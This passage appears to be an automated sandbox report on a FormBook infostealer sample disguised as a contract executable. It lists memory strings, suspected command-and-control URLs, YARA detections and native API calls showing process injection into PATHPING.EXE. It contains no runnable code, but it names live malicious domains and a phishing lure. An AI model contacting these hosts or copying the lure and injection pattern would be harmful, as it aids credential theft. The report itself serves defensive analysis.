                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:20:57 GMTContent-Type: text/html; charset=utf-8Content-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: PATHPING.EXE, 00000007.00000002.4136306334.0000000004348000.00000004.10000000.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135690068.0000000003548000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://roopiedutech.online/w5is/?xZa=jpgDOVH8PXW8oBA0&sn0PLN=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: RprkEKYwQARXc.exe, 00000008.00000002.4137334870.0000000005304000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cmdh1c.xyz
                Source: RprkEKYwQARXc.exe, 00000008.00000002.4137334870.0000000005304000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cmdh1c.xyz/6byd/
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmp, draft contract for order #782334.exe, 00000000.00000002.1761759486.00000000061E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: PATHPING.EXE, 00000007.00000002.4136306334.0000000004FD8000.00000004.10000000.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135690068.00000000041D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.adm.tools/parking-page/style.css
                Source: PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: PATHPING.EXE, 00000007.00000002.4134882508.000000000312B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: PATHPING.EXE, 00000007.00000002.4134882508.000000000312B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: PATHPING.EXE, 00000007.00000002.4134882508.000000000312B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: PATHPING.EXE, 00000007.00000002.4134882508.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033N
                Source: PATHPING.EXE, 00000007.00000002.4134882508.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: PATHPING.EXE, 00000007.00000003.2266500855.0000000007D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: PATHPING.EXE, 00000007.00000002.4138180842.0000000006340000.00000004.00000800.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4136306334.00000000052FC000.00000004.10000000.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135690068.00000000044FC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: PATHPING.EXE, 00000007.00000002.4136306334.0000000004FD8000.00000004.10000000.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135690068.00000000041D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.ukraine.com.ua/wiki/hosting/errors/site-not-served/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.draft contract for order #782334.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.draft contract for order #782334.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4134808556.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2090221764.0000000001390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4135588398.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4137334870.0000000005270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2091993107.0000000001B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: draft contract for order #782334.exe
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_07912D48 NtQueryInformationProcess,0_2_07912D48
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_07912D40 NtQueryInformationProcess,0_2_07912D40
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0042C343 NtClose,2_2_0042C343
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742B60 NtClose,LdrInitializeThunk,2_2_01742B60
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01742DF0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01742C70
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017435C0 NtCreateMutant,LdrInitializeThunk,2_2_017435C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01744340 NtSetContextThread,2_2_01744340
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01744650 NtSuspendThread,2_2_01744650
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742BF0 NtAllocateVirtualMemory,2_2_01742BF0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742BE0 NtQueryValueKey,2_2_01742BE0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742BA0 NtEnumerateValueKey,2_2_01742BA0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742B80 NtQueryInformationFile,2_2_01742B80
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742AF0 NtWriteFile,2_2_01742AF0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742AD0 NtReadFile,2_2_01742AD0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742AB0 NtWaitForSingleObject,2_2_01742AB0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742D30 NtUnmapViewOfSection,2_2_01742D30
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742D10 NtMapViewOfSection,2_2_01742D10
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742D00 NtSetInformationFile,2_2_01742D00
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742DD0 NtDelayExecution,2_2_01742DD0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742DB0 NtEnumerateKey,2_2_01742DB0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742C60 NtCreateKey,2_2_01742C60
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742C00 NtQueryInformationProcess,2_2_01742C00
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742CF0 NtOpenProcess,2_2_01742CF0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742CC0 NtQueryVirtualMemory,2_2_01742CC0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742CA0 NtQueryInformationToken,2_2_01742CA0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742F60 NtCreateProcessEx,2_2_01742F60
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742F30 NtCreateSection,2_2_01742F30
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742FE0 NtCreateFile,2_2_01742FE0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742FB0 NtResumeThread,2_2_01742FB0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742FA0 NtQuerySection,2_2_01742FA0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742F90 NtProtectVirtualMemory,2_2_01742F90
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742E30 NtWriteVirtualMemory,2_2_01742E30
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742EE0 NtQueueApcThread,2_2_01742EE0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742EA0 NtAdjustPrivilegesToken,2_2_01742EA0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742E80 NtReadVirtualMemory,2_2_01742E80
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01743010 NtOpenDirectoryObject,2_2_01743010
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01743090 NtSetValueKey,2_2_01743090
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017439B0 NtGetContextThread,2_2_017439B0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01743D70 NtOpenThread,2_2_01743D70
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01743D10 NtOpenProcessToken,2_2_01743D10
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03684340 NtSetContextThread,LdrInitializeThunk,7_2_03684340
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03684650 NtSuspendThread,LdrInitializeThunk,7_2_03684650
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682B60 NtClose,LdrInitializeThunk,7_2_03682B60
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682BE0 NtQueryValueKey,LdrInitializeThunk,7_2_03682BE0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03682BF0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_03682BA0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682AF0 NtWriteFile,LdrInitializeThunk,7_2_03682AF0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682AD0 NtReadFile,LdrInitializeThunk,7_2_03682AD0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682F30 NtCreateSection,LdrInitializeThunk,7_2_03682F30
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682FE0 NtCreateFile,LdrInitializeThunk,7_2_03682FE0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682FB0 NtResumeThread,LdrInitializeThunk,7_2_03682FB0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682EE0 NtQueueApcThread,LdrInitializeThunk,7_2_03682EE0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_03682E80
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_03682D30
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03682D10
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03682DF0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682DD0 NtDelayExecution,LdrInitializeThunk,7_2_03682DD0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682C60 NtCreateKey,LdrInitializeThunk,7_2_03682C60
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03682C70
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03682CA0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036835C0 NtCreateMutant,LdrInitializeThunk,7_2_036835C0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036839B0 NtGetContextThread,LdrInitializeThunk,7_2_036839B0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682B80 NtQueryInformationFile,7_2_03682B80
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682AB0 NtWaitForSingleObject,7_2_03682AB0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682F60 NtCreateProcessEx,7_2_03682F60
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682FA0 NtQuerySection,7_2_03682FA0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682F90 NtProtectVirtualMemory,7_2_03682F90
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682E30 NtWriteVirtualMemory,7_2_03682E30
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682EA0 NtAdjustPrivilegesToken,7_2_03682EA0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682D00 NtSetInformationFile,7_2_03682D00
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682DB0 NtEnumerateKey,7_2_03682DB0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682C00 NtQueryInformationProcess,7_2_03682C00
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682CF0 NtOpenProcess,7_2_03682CF0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03682CC0 NtQueryVirtualMemory,7_2_03682CC0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03683010 NtOpenDirectoryObject,7_2_03683010
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03683090 NtSetValueKey,7_2_03683090
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03683D70 NtOpenThread,7_2_03683D70
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_03683D10 NtOpenProcessToken,7_2_03683D10
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BC8E70 NtDeleteFile,7_2_02BC8E70
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BC8F20 NtClose,7_2_02BC8F20
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BC8C00 NtCreateFile,7_2_02BC8C00
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BC8D70 NtReadFile,7_2_02BC8D70
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BC9090 NtAllocateVirtualMemory,7_2_02BC9090
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_0172D3440_2_0172D344
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_079134BC0_2_079134BC
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_079150C00_2_079150C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_079100400_2_07910040
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_07918B800_2_07918B80
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_0791B7B00_2_0791B7B0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_079126180_2_07912618
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_0791D4380_2_0791D438
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_079153500_2_07915350
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_079153400_2_07915340
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_0791E1F00_2_0791E1F0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_079121580_2_07912158
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_079150B00_2_079150B0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_079100060_2_07910006
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_0791C0400_2_0791C040
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_07912EC80_2_07912EC8
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_07911D100_2_07911D10
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_07911D200_2_07911D20
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_0791BBF80_2_0791BBF8
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_07918B700_2_07918B70
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 0_2_0B9517200_2_0B951720
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_004183832_2_00418383
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_004028902_2_00402890
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_004031602_2_00403160
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0042E9832_2_0042E983
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_00402CC02_2_00402CC0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_004024F02_2_004024F0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0040FC8A2_2_0040FC8A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0040FC932_2_0040FC93
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_004165C32_2_004165C3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_004165BE2_2_004165BE
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0040FEB32_2_0040FEB3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0040DF332_2_0040DF33
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017981582_2_01798158
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AA1182_2_017AA118
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017001002_2_01700100
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C81CC2_2_017C81CC
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D01AA2_2_017D01AA
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C41A22_2_017C41A2
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A20002_2_017A2000
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CA3522_2_017CA352
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171E3F02_2_0171E3F0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D03E62_2_017D03E6
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B02742_2_017B0274
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017902C02_2_017902C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017105352_2_01710535
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D05912_2_017D0591
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C24462_2_017C2446
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B44202_2_017B4420
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017BE4F62_2_017BE4F6
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017107702_2_01710770
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017347502_2_01734750
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170C7C02_2_0170C7C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172C6E02_2_0172C6E0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017269622_2_01726962
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A02_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017DA9A62_2_017DA9A6
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171A8402_2_0171A840
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017128402_2_01712840
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173E8F02_2_0173E8F0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F68B82_2_016F68B8
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CAB402_2_017CAB40
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C6BD72_2_017C6BD7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170EA802_2_0170EA80
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017ACD1F2_2_017ACD1F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171AD002_2_0171AD00
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170ADE02_2_0170ADE0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01728DBF2_2_01728DBF
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710C002_2_01710C00
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01700CF22_2_01700CF2
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B0CB52_2_017B0CB5
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01784F402_2_01784F40
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01730F302_2_01730F30
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B2F302_2_017B2F30
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01752F282_2_01752F28
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01702FC82_2_01702FC8
